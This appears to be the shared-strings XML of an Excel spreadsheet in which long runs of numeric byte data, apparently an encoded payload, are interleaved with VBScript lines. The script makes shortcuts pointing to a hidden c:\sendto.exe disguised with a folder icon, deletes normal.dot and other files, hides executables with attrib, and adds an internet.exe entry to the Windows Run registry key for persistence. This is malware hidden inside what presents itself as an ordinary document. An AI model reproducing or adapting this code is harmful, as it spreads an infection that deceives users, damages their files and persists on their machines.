245 203 170 43 241 230 198 193 61 123 46 184 249 120 221 141 194 93 87 11 103 60 24 164 106 202 216 174 46 223 88 157 87 21 139 62 141 223 86 181 104 221 239 137 239 38 44 59 177 194 221 97 181 241 128 225 242 192 234 15 150 229 54 212 53 119 106 138 56 154 116 96 222 45 33 102 125 157 189 54 127 82 74 65 191 188 250 5 98 111 199 229 235 93 99 106 74 31 94 243 31 190 127 57 225 248 234 197 23 27 189 230 165 19 234 50 222 156 176 100 79 255 199 99 154 119 111 21 142 126 188 67 99 190 119 116 203 249 229 29 151 103 86 44 185 158 220 117 71 76 241 254 85 189 78 118 121 56 233 214 138 91 55 18 51 115 143 91 142 172 121 132 198 14 137 175 139 177 12 168 173 207 178 52 233 14 13 234 178 198 118 66 213 196 95 95 181 </t>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
        <charset val="0"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">164 244 102 220 197 56 161 225 116 150 49 43 118 246 162 149 183 251 53 143 250 251 165 154 13 251 183 205 185 244 217 222 95 247 173 121 101 200 222 27 103 248 228 38 103 202 71 15 155 18 165 211 7 110 254 246 218 194 41 113 71 220 142 83 183 227 186 244 248 217 49 236 66 135 228 91 155 238 12 57 250 194 194 105 7 175 221 61 236 73 182 254 181 253 186 243 238 157 239 71 88 175 230 52 12 31 63 235 253 183 46 85 36 29 219 88 50 99 250 149 181 159 204 153 107 189 34 20 237 74 95 231 78 200 157 191 187 100 222 136 162 111 207 236 232 49 229 235 81 27 14 247 185 207 78 111 74 110 174 189 61 233 222 217 71 29 7 255 145 55 250 229 115 205 231 26 31 49 179 163 217 181 255 63 175 253 207 127 54 195 100 160 19 227 84 94 213 163 6 31 50 91 249 89 231 133 204 192 89 197 20 65 142 134 89 172 44 194 100 245 140 133 120 73 77 210 184 214 135 29 91 210 106 248 187 48 168 119 48 29 65 30 113 210 124 70 221 53 232 139 233 35 80 141 186 155 114 29 79 29 140 42 150 208 84 97 104 52 74 27 31 66 139 8 83 46 50 12 173 67 24 90 199 48 180 168 48 52 77 24 90 167 48 188 116 14 67 139 126 146 246 15 155 162 190 16 88 36 0 128 67 75 236 61 11 108 28 199 117 179 123 191 229 241 142 60 146 71 241 68 241 179 164 40 234 72 253 142 20 45 159 28 73 62 82 148 124 180 101 153 142 21 155 141 29 248 232 144 6 5 211 212 89 162 156 179 173 20 231 68 9 104 192 13 216 64 104 207 169 139 50 128 209 178 109 96 80 110 106 51 128 139 48 128 11 176 129 129 92 218 162 38 2 3 102 218 0 101 138 6 165 211 166 33 106 135 215 153 183 111 246 199 217 229 81 138 219 160 232 17 199 55 239 205 239 205 155 55 111 102 222 206 236 81 90 72 80 94 88 144 174 74 64 171 22 208 152 100 236 180 26 1 173 86 64 171 19 208 162 64 179 242 87 47 160 237 18 228 109 16 208 98 130 188 187 5 233 26 5 180 61 2 90 147 128 214 44 160 181 8 104 173 54 154 31 30 114 91 31 37 210 200 </t>
  </si>
  <si>
    <r>
      <t>lnk.</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>TargetPath="c:\sendto.exe"</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve">205 93 164 33 68 204 91 208 22 15 25 144 175 147 95 65 47 203 84 30 125 240 224 254 8 104 106 53 206 142 236 113 40 123 65 235 110 210 16 224 94 194 125 236 153 171 188 36 47 53 75 3 158 127 132 2 36 40 224 14 40 96 47 168 53 175 190 61 5 195 162 20 214 238 30 156 102 197 246 191 4 153 216 184 218 5 143 209 253 84 122 30 172 85 194 90 169 206 151 60 164 255 117 72 234 129 242 143 65 210 22 24 14 230 230 209 161 80 82 180 242 251 191 2 233 189 144 254 78 72 223 133 195 213 40 154 14 147 82 157 93 28 3 82 250 69 150 213 7 89 79 67 214 131 48 162 204 85 209 209 84 162 146 12 19 203 70 166 153 74 178 38 207 114 251 33 247 32 228 110 132 177 103 174 152 226 191 242 146 1 202 24 75 27 128 180 236 40 3 195 20 192 146 136 85 128 108 170 16 11 2 22 65 172 18 176 123 16 11 65 190 52 98 97 136 227 165 84 1 118 28 177 106 75 153 17 192 124 136 213 0 54 132 88 173 165 148 58 75 41 81 168 239 20 98 245 128 249 17 219 5 41 155 17 107 0 108 55 98 49 72 73 16 219 13 113 7 16 107 4 236 32 98 123 0 59 132 88 19 96 135 17 107 6 108 15 98 45 128 53 33 214 10 24 59 210 241 30 237 129 235 180 105 147 242 41 210 79 213 242 0 60 255 59 69 107 168 218 209 31 27 95 170 96 204 181 9 104 237 2 155 176 87 144 174 67 144 110 159 128 214 41 160 237 23 208 226 2 90 151 128 214 45 224 229 128 128 118 80 64 59 36 40 239 176 128 118 68 64 75 8 104 61 2 90 175 160 222 163 2 90 159 128 118 135 128 118 76 64 187 83 64 75 10 104 199 5 180 187 4 180 79 9 104 39 4 180 147 2 218 41 129 12 238 182 209 152 86 171 160 213 61 168 227 109 128 29 65 172 29 198 20 31 153 123 33 174 17 177 14 136 171 71 108 31 96 109 136 117 2 118 23 98 251 1 251 20 98 113 192 78 32 214 5 216 89 196 186 161 134 26 196 14 0 38 33 118 16 48 47 98 135 32 159 140 216 97 192 2 136 29 1 172 3 177 4 96 237 136 245 0 22 </t>
  </si>
  <si>
    <t>lnk.IconLocation="shell32.dll,6"</t>
  </si>
  <si>
    <t xml:space="preserve">69 172 23 202 84 16 59 10 113 123 17 235 131 184 90 196 238 0 172 14 177 99 128 117 35 118 39 96 113 196 146 128 237 71 236 56 96 157 136 221 5 88 23 98 159 2 172 23 177 19 128 85 32 118 18 176 1 196 78 1 103 97 196 238 6 108 31 218 161 20 243 175 201 59 179 59 34 59 148 18 232 75 191 128 54 32 160 157 22 232 223 160 128 118 70 64 59 43 160 221 35 160 165 5 180 33 1 47 247 10 210 221 39 160 157 19 228 189 95 144 238 188 128 246 128 32 239 176 32 221 131 130 241 150 130 222 107 197 190 236 7 76 69 108 192 50 71 159 6 29 8 34 54 8 88 8 177 51 128 85 34 118 22 48 15 98 247 0 86 141 88 26 176 22 196 134 160 134 20 98 247 66 92 3 98 247 1 22 67 236 28 164 220 133 216 253 22 173 62 111 209 234 7 32 101 63 98 195 16 119 20 177 7 33 238 36 232 106 156 140 209 1 123 65 218 94 31 79 201 181 228 45 63 91 227 164 76 107 163 102 216 19 193 146 2 22 60 119 19 223 191 209 36 126 88 135 5 255 127 95 250 127 244 115 1 159 219 221 234 57 76 186 248 147 74 248 91 120 229 158 191 100 3 114 165 134 159 191 124 156 60 68 55 224 195 20 246 222 2 255 108 33 124 43 247 191 226 242 214 250 143 222 90 253 82 37 158 147 46 183 254 10 60 159 203 62 47 92 235 185 173 254 243 163 252 119 210 126 102 174 126 249 176 225 70 149 93 206 127 111 98 223 50 88 238 249 111 102 214 26 224 168 10 129 13 68 163 237 252 119 11 158 255 86 203 56 255 205 166 243 79 234 252 55 107 147 253 252 247 25 164 187 157 255 230 231 219 135 5 231 191 89 28 251 62 226 112 254 251 115 152 198 124 254 155 225 252 252 247 184 233 252 247 4 194 79 242 115 249 51 121 212 138 60 126 185 134 84 152 180 149 233 71 166 157 107 140 4 218 49 228 51 199 251 201 143 31 213 240 155 56 89 124 15 11 120 5 225 79 251 140 252 236 255 69 76 255 10 150 243 187 136 51 174 120 217 10 213 27 214 139 63 69 124 20 75 168 241 27 105 249 71 34 127 6 99 218 147 169 144 180 83 </t>
  </si>
  <si>
    <t>lnk.save</t>
  </si>
  <si>
    <t xml:space="preserve">222 255 147 247 40 36 242 71 164 1 235 125 27 30 179 64 208 119 31 29 146 237 222 92 169 45 204 180 255 193 92 233 209 233 146 162 176 159 37 232 144 72 152 45 243 27 167 75 164 219 155 45 209 68 62 15 233 240 146 112 145 142 66 37 87 10 39 168 84 39 179 165 95 176 98 255 161 49 87 106 250 109 58 14 188 211 165 95 176 151 100 236 207 148 246 109 205 18 103 46 19 47 201 149 104 161 178 54 42 217 184 110 162 252 116 224 3 162 90 248 31 50 217 131 168 126 42 158 208 156 30 50 77 191 1 200 156 100 58 204 174 244 208 177 165 217 22 249 196 9 61 196 126 153 85 172 63 17 93 47 100 203 201 252 65 224 166 131 72 18 175 209 67 7 65 65 110 218 114 126 191 133 63 223 153 66 6 78 76 235 245 230 244 208 53 82 174 254 6 72 162 157 63 238 241 130 245 224 58 150 109 55 167 147 201 15 53 159 48 249 45 244 28 61 135 240 56 194 26 132 47 157 66 125 198 227 251 199 209 61 253 98 202 125 28 252 176 82 131 31 34 172 192 174 104 67 56 138 244 231 16 31 10 107 240 25 14 79 106 176 31 159 247 13 33 206 199 31 31 103 21 218 143 173 147 30 132 223 68 248 61 132 63 214 224 99 212 124 37 168 137 221 75 205 14 93 60 118 155 8 125 68 138 32 161 7 8 236 7 219 183 144 182 164 122 130 170 205 150 84 99 68 170 181 144 122 168 105 126 82 68 28 223 90 222 81 59 105 148 114 104 35 221 65 205 190 141 255 94 35 77 2 139 239 179 167 233 17 54 200 202 85 47 253 59 126 171 173 28 163 156 217 210 29 167 41 69 165 117 32 233 73 252 235 166 60 222 73 217 233 133 239 24 13 31 119 168 84 32 48 107 51 159 44 43 91 178 140 222 101 58 240 129 172 91 223 62 92 67 36 113 126 149 111 99 45 179 249 125 137 174 70 73 94 49 246 27 249 10 189 166 246 23 169 217 164 163 52 195 108 63 13 159 160 171 214 28 134 217 70 112 81 15 203 100 9 195 9 58 247 46 87 104 225 40 109 192 50 210 59 168 60 87 49 252 105 242 60 41 84 106 225 12 157 243 51 152 158 185 85 139 212 </t>
  </si>
  <si>
    <t>goto e2</t>
  </si>
  <si>
    <t xml:space="preserve">12 122 177 252 9 191 157 159 16 240 3 15 140 104 26 47 53 193 249 0 175 235 16 72 132 243 22 35 6 111 42 134 253 212 38 41 30 45 28 162 235 162 136 196 235 173 102 82 128 240 48 21 124 178 146 167 169 131 27 93 60 239 140 169 252 89 83 249 195 196 72 95 192 112 140 174 159 230 137 209 174 37 83 222 17 61 236 35 69 12 179 135 56 89 228 167 138 206 30 25 201 104 227 138 169 174 85 83 120 205 84 239 156 100 212 155 84 180 112 55 121 150 204 42 6 255 19 138 193 67 86 49 241 160 152 234 82 140 242 243 166 240 176 98 200 106 17 94 69 165 192 234 117 89 49 248 143 201 6 255 69 201 200 187 32 25 117 69 2 6 159 138 137 31 213 84 87 220 92 102 192 40 51 30 48 210 196 60 6 15 235 40 135 94 186 54 76 5 12 153 67 36 166 223 48 245 133 246 42 45 67 175 184 190 197 29 244 63 137 237 98 171 234 66 152 151 67 200 98 152 151 79 229 96 10 23 49 204 86 149 170 41 253 42 134 217 244 183 30 50 209 77 225 117 83 57 43 33 99 220 45 202 134 172 230 100 163 93 243 24 102 46 138 100 80 11 55 209 181 118 46 200 199 197 221 164 16 228 242 188 155 44 4 141 190 206 6 141 114 38 76 225 140 158 166 146 140 4 13 57 47 5 141 49 78 130 198 24 79 120 140 49 158 149 141 49 190 97 26 227 235 38 253 73 123 196 242 79 209 188 218 24 15 145 44 150 201 214 21 57 15 111 35 149 173 79 11 179 165 192 44 202 135 21 157 13 25 118 163 96 43 31 86 139 146 66 87 25 159 83 127 254 78 210 100 255 126 207 155 1 120 13 247 94 124 23 126 137 230 27 198 220 105 216 55 189 41 183 17 191 164 146 40 64 31 121 21 210 61 133 249 174 17 99 117 172 64 250 203 242 91 132 165 98 7 251 212 147 42 185 38 171 228 186 204 40 210 46 137 120 23 104 83 95 166 187 164 27 20 198 168 153 59 70 219 51 76 191 215 31 52 94 81 246 236 213 133 151 88 145 248 226 55 242 38 163 75 108 48 69 105 5 175 225 51 50 254 97 103 208 181 159 87 10 209 248 115 164 32 53 147 247 </t>
  </si>
  <si>
    <t>end if</t>
  </si>
  <si>
    <t xml:space="preserve">241 181 90 112 237 147 29 156 133 4 23 77 105 25 251 147 218 149 6 118 190 75 251 209 38 83 90 22 191 108 43 223 92 86 123 175 65 127 194 68 175 116 40 79 53 133 199 105 217 239 219 120 187 68 121 87 164 143 129 111 85 192 251 164 141 247 115 146 51 111 116 75 104 106 135 56 60 76 203 200 73 118 30 196 105 47 82 222 74 165 215 32 117 143 128 55 231 48 95 102 151 74 131 208 103 202 219 95 125 238 195 155 21 3 127 124 238 230 71 109 31 174 253 83 247 201 143 62 254 175 185 137 200 159 80 203 125 224 232 51 127 41 58 121 245 135 207 255 249 227 103 254 253 107 253 191 255 131 170 223 121 35 219 189 18 65 23 130 15 93 7 38 69 71 140 77 93 138 61 155 189 106 141 177 251 207 240 2 136 174 86 172 40 6 63 64 124 25 83 176 227 11 255 59 55 231 217 219 198 100 242 80 68 227 83 34 15 133 244 208 13 45 20 36 25 26 234 148 153 233 79 208 80 11 44 142 78 181 243 150 53 158 43 51 164 124 114 57 96 252 179 46 125 140 154 208 159 48 167 11 237 70 182 228 56 75 191 255 89 109 244 248 179 87 111 156 98 221 176 151 34 51 48 254 121 151 24 29 149 130 206 249 90 239 31 188 125 173 183 107 240 79 239 255 210 208 43 247 60 243 238 110 193 149 112 187 62 245 249 126 20 174 152 249 187 115 223 25 244 121 143 252 243 135 223 45 83 159 236 217 236 85 151 175 79 131 59 214 162 177 95 179 222 165 36 166 79 143 158 211 181 40 98 215 39 182 227 237 208 247 190 19 122 40 162 135 162 122 40 166 135 154 244 144 170 135 66 122 40 174 135 14 234 161 4 134 12 77 149 79 56 237 255 119 164 149 162 208 13 222 202 69 90 219 146 172 149 60 169 215 145 213 67 226 253 63 15 105 165 240 94 149 200 121 186 46 120 1 142 172 38 232 58 32 65 87 227 108 111 121 8 41 9 75 232 244 22 154 249 175 143 110 44 191 8 74 200 122 72 146 230 233 4 41 231 55 209 250 104 111 104 99 62 88 66 172 62 41 130 222 78 230 209 172 172 81 101 141 230 201 16 34 126 133 222 53 58 183 51 72 247 10 </t>
  </si>
  <si>
    <t>next</t>
  </si>
  <si>
    <t xml:space="preserve">227 5 153 77 156 236 48 219 171 48 62 46 126 121 115 203 91 206 24 84 245 135 55 99 80 143 140 233 20 26 187 100 226 102 43 95 73 72 255 165 185 40 240 181 137 47 117 100 222 154 77 151 244 128 123 180 109 30 143 79 144 157 227 204 251 206 134 248 251 20 175 32 90 59 60 80 79 8 234 113 107 47 131 183 19 79 200 246 242 220 174 252 246 185 119 100 109 247 91 42 205 234 134 204 147 178 203 109 66 214 22 14 57 83 59 25 100 116 5 227 217 39 115 253 49 40 143 167 203 163 15 141 237 43 20 147 169 132 121 71 66 3 136 50 205 35 156 65 56 139 176 128 112 14 225 60 194 5 132 139 8 151 16 46 35 44 34 92 65 184 138 144 189 173 212 77 46 108 31 86 244 104 94 239 105 83 123 147 148 150 242 110 150 88 123 216 207 194 122 136 33 231 172 87 243 242 103 224 233 130 70 143 33 157 165 31 52 209 225 201 209 245 183 116 57 141 72 218 66 244 118 251 27 218 136 111 29 254 77 125 75 15 227 143 201 181 207 36 15 152 51 80 174 29 54 250 42 202 85 53 245 3 188 117 5 211 71 108 114 5 187 131 122 85 100 119 152 125 218 219 113 136 45 221 130 79 235 23 246 227 193 21 38 58 47 151 253 182 176 189 220 89 175 6 227 62 13 38 16 38 17 166 16 166 17 14 35 28 65 152 65 56 129 144 221 117 82 252 26 127 239 91 235 251 42 231 227 93 27 31 73 191 198 247 178 141 111 51 63 203 8 139 8 87 16 174 34 92 67 184 142 112 131 243 195 116 223 86 31 231 99 94 32 15 198 119 193 33 253 140 3 61 39 40 103 6 235 207 251 17 71 56 139 176 224 39 120 136 218 184 42 145 224 54 92 182 206 85 78 116 144 11 33 154 31 9 63 131 120 35 254 85 185 32 139 181 53 196 214 187 180 210 194 123 3 3 222 178 221 154 162 100 201 237 189 159 229 120 164 111 47 149 200 25 252 129 164 203 41 89 198 101 148 237 188 158 97 240 106 48 75 191 46 49 175 131 2 71 81 137 201 179 200 61 46 204 209 49 108 242 70 172 34 157 61 99 204 32 253 44 63 205 14 158 42 170 245 50 247 184 224 59 </t>
  </si>
  <si>
    <t>e2:</t>
  </si>
  <si>
    <t xml:space="preserve">146 177 156 89 217 240 238 128 23 71 224 5 225 203 109 73 90 246 48 15 69 66 247 72 100 49 102 4 97 196 228 113 48 227 220 38 205 114 189 69 184 136 144 219 221 132 100 165 47 216 202 91 66 184 194 117 85 178 198 175 219 232 17 132 49 94 191 100 205 63 135 248 26 175 79 178 242 179 132 120 146 219 69 164 175 241 122 113 94 140 32 84 17 166 17 142 216 230 231 130 13 242 121 151 205 241 96 31 17 38 17 22 16 206 34 204 33 92 244 88 235 205 249 108 237 180 217 177 121 91 60 199 137 223 42 63 30 207 237 96 26 158 86 255 220 203 215 110 220 238 197 253 86 124 209 111 229 139 183 63 226 177 202 129 183 55 46 91 229 188 193 203 183 173 75 178 152 127 6 161 226 101 107 169 111 121 218 200 121 249 91 240 12 250 85 192 7 82 255 194 86 38 151 166 200 212 133 167 240 73 4 164 55 201 241 111 104 222 117 196 215 40 252 25 205 217 41 171 228 29 249 8 121 67 142 195 62 103 132 166 121 139 110 107 131 196 120 91 1 75 181 143 28 148 37 58 155 38 228 169 11 111 146 106 178 252 205 31 124 244 183 155 111 172 196 59 63 211 117 248 240 97 154 67 33 223 94 248 238 143 226 157 143 116 189 73 87 119 236 26 45 92 151 39 29 100 144 230 220 71 146 240 255 97 250 127 32 197 164 49 174 233 11 229 227 45 47 171 33 174 159 70 17 151 31 36 223 121 237 189 95 222 252 89 188 51 221 197 106 91 252 240 251 127 21 239 124 96 219 218 204 117 26 118 125 197 203 183 236 210 202 77 210 15 87 159 175 78 147 113 245 225 129 199 207 143 62 77 3 39 213 246 11 19 23 9 191 16 28 121 170 61 28 12 190 60 48 122 69 146 95 78 188 144 72 36 122 19 195 201 158 227 135 72 36 225 81 78 7 72 84 174 149 58 18 137 190 99 95 124 49 124 237 158 201 75 79 140 78 74 197 200 67 217 209 207 75 95 63 59 58 233 189 50 30 26 131 139 189 202 232 19 147 245 173 195 151 199 199 102 199 63 63 57 74 252 67 99 228 166 114 225 242 213 240 192 153 92 246 18 77 24 109 130 123 167 100 116 122 124 112 252 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\normal.dot"</t>
  </si>
  <si>
    <t xml:space="preserve">242 197 103 61 114 237 215 7 174 94 153 190 244 244 69 255 243 222 65 79 47 187 112 156 35 236 194 241 249 241 47 168 75 75 171 61 225 224 112 190 45 191 79 133 27 202 95 249 198 227 15 144 236 248 84 188 43 28 124 128 76 169 240 11 245 106 228 211 227 87 174 230 95 63 63 158 147 167 201 179 218 29 81 162 93 18 157 184 68 190 128 183 229 201 208 212 133 209 43 79 61 49 90 117 57 112 81 137 122 107 217 123 43 8 87 133 124 123 215 225 135 47 94 185 24 188 65 238 31 159 186 58 48 122 249 138 55 222 46 157 5 225 7 72 221 139 65 82 1 29 163 208 158 185 174 12 77 143 63 45 165 124 216 113 222 206 244 187 62 232 88 194 123 214 75 187 54 12 239 93 240 228 63 219 184 91 211 32 249 145 206 58 118 21 58 119 56 217 159 205 230 79 166 164 51 103 195 65 239 208 147 254 11 240 2 11 50 53 173 158 96 239 111 73 177 251 181 225 224 95 127 246 10 57 220 63 54 22 14 158 153 90 98 55 163 195 193 211 50 157 181 194 101 31 216 115 245 29 145 29 239 230 35 130 208 57 65 121 162 144 123 189 55 202 172 87 144 247 27 34 143 219 240 173 123 215 228 19 239 234 126 135 162 30 250 123 61 180 162 135 222 215 67 171 122 232 39 122 104 77 15 253 171 30 90 215 67 255 161 135 54 244 208 199 219 248 59 206 146 211 244 59 64 142 210 85 90 47 233 39 135 232 55 65 41 44 196 46 240 30 163 214 145 209 238 100 207 103 192 223 145 68 15 9 203 115 148 210 123 104 232 14 244 119 68 246 51 127 199 218 209 157 251 59 248 62 190 59 255 23 178 182 70 106 130 181 167 15 247 201 246 189 88 168 230 117 89 251 101 18 177 127 36 214 77 200 210 230 37 50 135 113 7 105 202 62 250 87 197 30 89 208 124 93 95 214 246 133 33 221 239 65 231 10 9 79 225 0 63 17 228 43 178 173 127 129 216 252 40 49 201 205 143 18 197 242 166 100 46 159 74 201 72 151 151 196 245 195 60 140 112 24 215 19 35 8 217 179 214 202 154 183 229 98 5 115 155 56 251 139 114 116 134 102 107 22 230 47 98 199 240 91 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\norma1.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">233 223 0 121 21 150 251 109 38 121 20 37 35 207 117 132 229 200 1 160 105 191 205 158 125 178 253 182 234 183 238 195 151 137 177 15 55 211 217 243 179 60 238 57 120 125 230 248 12 198 71 4 242 49 167 155 145 141 179 61 162 248 9 140 47 218 232 75 72 95 116 200 183 138 241 5 135 120 182 130 206 227 91 84 69 241 42 198 143 56 196 167 48 62 233 212 126 140 143 9 218 111 214 147 148 108 172 255 44 237 198 252 105 27 61 139 244 117 91 125 69 164 175 56 240 179 238 113 151 87 196 235 46 175 132 215 93 94 195 94 119 121 101 189 238 242 154 245 150 39 175 12 247 119 121 173 249 11 152 95 33 203 155 102 250 28 210 211 246 254 247 185 235 175 234 115 214 95 176 121 222 95 159 191 195 92 111 220 103 156 115 227 233 205 241 139 62 222 78 99 156 155 227 87 48 126 94 18 183 107 3 227 103 28 226 217 3 98 22 63 225 16 159 150 196 246 96 216 239 46 207 172 191 60 123 80 240 27 229 139 226 115 126 222 126 135 113 41 25 242 73 154 108 171 178 155 192 153 23 216 59 85 104 167 115 45 250 143 246 175 154 254 57 233 159 27 223 195 1 119 190 178 129 173 237 50 235 19 223 95 177 51 70 176 47 10 216 218 29 16 235 241 114 192 93 238 107 1 119 61 78 96 125 27 8 89 3 64 94 8 35 8 99 8 217 217 25 139 93 193 242 237 242 204 40 6 191 34 190 242 24 31 119 136 159 83 182 202 19 246 241 54 185 44 99 186 25 167 246 99 252 132 67 188 82 177 149 79 161 253 195 116 19 21 14 243 84 133 49 110 45 227 149 235 179 36 169 66 187 91 33 30 79 115 21 238 253 186 84 225 220 175 161 154 77 72 231 113 93 95 220 75 34 65 126 202 143 157 8 14 144 71 200 13 201 190 222 74 4 157 215 23 150 126 64 126 84 187 92 130 238 227 98 38 232 62 255 207 7 13 253 18 214 139 241 41 167 254 15 26 124 137 226 217 195 112 81 191 169 72 111 165 57 45 227 5 253 33 241 74 113 121 35 149 238 122 157 171 20 235 53 227 211 210 255 149 238 227 103 169 210 221 78 174 58 212 195 218 5 245 33 92 </t>
  </si>
  <si>
    <t>fso.deletefile "c:\internet.exe"</t>
  </si>
  <si>
    <t xml:space="preserve">175 180 217 255 80 121 118 58 133 233 98 145 242 236 99 58 228 108 255 220 242 229 66 70 255 236 36 223 234 14 234 19 218 235 144 120 92 174 35 93 218 233 252 128 249 192 207 111 182 15 72 103 39 198 202 41 103 162 106 171 60 96 253 97 211 159 5 93 110 214 250 102 28 218 181 22 18 143 131 76 149 56 125 50 188 115 249 10 199 127 149 251 120 153 175 114 183 31 139 97 49 223 171 152 143 249 43 133 235 255 106 172 215 33 126 216 161 221 169 42 231 118 91 250 169 154 235 201 206 244 189 80 237 62 174 23 171 157 199 167 112 220 85 185 151 151 172 22 183 83 141 148 103 7 178 38 126 44 227 182 122 251 113 107 225 51 44 230 99 62 178 253 190 192 178 174 8 25 251 12 203 120 136 24 227 214 82 126 104 171 126 149 83 79 170 102 107 251 44 242 195 114 153 255 219 34 23 204 151 112 88 95 23 48 126 201 65 47 23 49 126 206 33 126 101 155 242 55 48 62 227 144 63 86 187 53 191 217 223 144 170 181 174 7 22 90 202 180 167 181 238 243 217 108 173 187 29 88 168 117 183 3 75 78 122 28 16 211 217 253 39 70 95 171 117 231 123 161 78 108 95 150 28 236 232 8 166 159 136 150 57 47 132 203 27 103 179 97 99 254 16 197 23 235 202 156 183 111 195 110 151 211 158 88 141 117 255 202 247 23 35 81 155 253 141 226 186 189 190 188 114 215 170 141 245 176 101 126 170 19 219 159 100 212 208 23 203 248 10 139 233 145 250 237 237 140 121 190 213 219 87 111 219 191 163 190 173 218 218 59 227 96 223 178 17 195 111 98 25 167 117 219 247 147 165 252 58 247 125 94 33 138 231 29 234 113 253 103 227 91 169 51 198 159 197 158 70 197 242 157 175 223 25 127 177 168 184 253 51 187 202 211 219 101 135 241 61 131 229 22 109 237 33 40 239 137 6 219 186 32 38 30 207 11 245 134 223 192 50 47 213 138 211 79 212 137 249 73 239 218 234 159 17 206 15 53 198 120 118 243 211 110 39 151 149 50 199 125 220 65 254 115 245 226 126 87 99 229 149 187 24 217 186 206 177 236 155 29 236 239 112 237 206 244 39 130 242 26 177 245 231 72 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">149 88 63 83 187 220 231 19 118 117 221 62 159 84 214 124 91 214 238 104 136 247 205 153 189 116 190 219 124 138 168 181 154 95 62 78 180 115 156 50 250 229 45 114 109 112 151 75 188 94 188 31 40 34 189 80 107 235 103 164 231 119 219 218 111 170 199 98 23 27 140 121 220 98 87 176 221 171 187 111 207 206 43 14 250 164 54 138 237 116 182 113 251 117 171 235 252 23 21 203 107 30 219 233 177 239 115 26 157 199 97 57 246 157 221 121 0 255 215 30 219 184 64 62 216 195 48 11 29 251 199 111 227 99 181 113 103 122 206 94 165 32 180 115 56 30 99 77 219 200 169 78 44 39 181 73 172 39 145 168 88 126 137 104 121 254 120 118 81 13 246 159 77 232 255 70 152 110 178 181 171 209 161 93 77 238 126 174 121 140 159 221 166 221 137 38 135 125 109 83 153 235 34 156 95 146 173 14 243 79 131 216 206 20 145 238 179 201 101 196 166 55 27 141 226 121 36 230 96 127 227 77 92 159 108 254 214 38 177 191 181 216 236 190 190 94 111 118 183 135 145 22 177 191 104 22 251 51 214 130 178 69 24 111 177 173 99 91 118 182 79 155 109 52 158 39 89 232 187 196 253 24 143 137 229 49 130 245 202 118 251 215 226 48 111 71 184 190 111 179 46 119 226 35 34 166 111 132 196 227 43 187 71 76 95 220 83 222 58 97 189 81 220 238 133 38 177 222 172 180 150 167 239 204 33 234 230 23 80 213 173 250 178 19 123 29 105 22 175 179 211 205 226 113 180 209 34 78 79 90 157 253 8 150 113 222 104 221 119 20 246 224 179 30 21 237 185 106 43 183 109 103 250 154 113 232 119 165 77 108 63 35 109 226 254 201 181 149 215 63 202 30 241 124 146 67 122 192 70 95 112 160 175 182 242 241 33 182 223 197 86 155 221 81 141 244 22 251 170 138 231 245 117 147 28 193 94 224 251 54 156 246 169 153 221 98 57 230 99 14 254 31 85 172 23 74 141 216 94 37 218 240 156 99 187 173 222 106 35 61 59 119 205 94 71 52 141 103 64 84 236 63 246 137 202 141 222 172 137 46 155 218 1 207 231 218 209 254 237 197 250 16 38 247 218 236 152 169 61 162 207 108 </t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t xml:space="preserve">251 206 238 35 172 211 244 49 202 243 90 7 214 219 113 251 247 25 20 202 115 186 93 147 7 60 139 54 181 27 124 61 148 62 71 235 153 52 221 51 224 244 34 165 63 102 186 63 48 215 140 243 63 182 43 221 97 235 175 70 113 63 230 91 197 246 96 166 213 120 174 7 231 228 59 233 218 223 196 71 214 62 254 219 140 125 52 75 191 74 59 44 45 184 79 177 76 233 73 27 221 194 79 91 121 254 221 116 204 221 31 147 111 20 183 43 210 200 199 169 205 46 216 236 87 204 166 79 49 140 207 236 179 205 103 166 245 34 107 223 6 141 143 11 218 61 65 229 23 51 209 101 236 71 208 3 65 250 52 77 239 53 201 123 139 255 95 181 242 203 244 146 151 71 76 249 248 245 206 120 167 22 63 67 225 250 166 153 15 212 23 140 159 167 112 85 112 31 98 2 227 151 40 44 10 238 81 172 116 178 51 100 91 233 240 204 120 211 249 158 209 130 173 29 41 90 142 114 80 59 7 99 30 43 107 7 126 51 238 15 49 222 44 235 210 253 232 199 116 154 23 49 126 217 105 158 137 227 121 17 39 191 65 220 253 249 122 58 238 254 124 125 34 238 190 46 157 137 255 119 119 215 31 219 196 117 199 159 207 151 224 56 118 112 182 132 166 165 148 227 32 228 220 36 23 255 128 214 77 73 57 219 4 2 109 33 77 210 66 85 58 226 36 71 156 226 216 198 103 7 103 16 97 126 148 102 157 170 102 108 101 12 117 40 140 182 66 83 170 25 169 5 166 110 195 29 172 141 186 169 13 157 166 69 85 215 24 198 218 252 179 41 157 250 7 154 42 178 247 238 222 139 125 23 219 165 237 166 85 35 74 190 220 123 239 222 189 123 239 251 253 188 239 187 123 223 207 125 193 251 31 46 255 243 121 149 255 206 228 182 183 109 108 198 63 87 61 191 101 115 207 31 22 141 125 49 203 51 229 100 28 230 176 62 91 53 246 89 157 27 223 152 234 220 254 186 80 157 103 95 146 53 247 60 155 180 222 218 122 108 20 183 111 220 138 231 119 44 39 177 76 99 57 141 229 12 150 55 176 68 116 124 178 158 97 201 232 52 241 66 124 126 59 72 216 240 222 172 134 76 153 22 </t>
  </si>
  <si>
    <t>w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe","internet.exe"</t>
  </si>
  <si>
